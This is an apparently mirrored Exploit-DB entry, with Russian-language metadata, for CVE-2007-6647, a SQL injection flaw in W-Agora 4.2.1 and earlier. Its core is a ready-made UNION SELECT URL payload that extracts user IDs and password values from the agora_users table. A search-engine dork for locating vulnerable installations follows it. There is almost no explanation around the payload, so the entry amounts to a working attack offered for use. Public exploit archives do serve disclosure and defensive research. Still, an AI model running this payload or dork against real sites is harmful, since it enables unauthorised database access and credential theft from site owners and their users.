- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4817
- Проверка EDB
-
- Пройдено
- Автор
- IHTEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-6647
- Дата публикации
- 2007-12-30
Код:
#########################################################################################
#
# [W-Agora <= 4.2.1]
#
# Class: SQL Injection # Found: 30/12/2007 # Remote: Yes # Site: http://w-agora.net
# Download: http://sourceforge.net/project/showfiles.php?group_id=3413
# #########################################################################################
Exploit :
===================================================================================================================================================================================================================
http://site.com/[w-agora_path]/index.php?site=[site_name]&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
===================================================================================================================================================================================================================
Thanks To:
=========================
All ihteam.net members;
=========================
DORK: allinurl:"index.php?site=" "W-Agora"
#ihteam.net - Inclusion Hunter Team
# milw0rm.com [2007-12-30]- Источник
- www.exploit-db.com
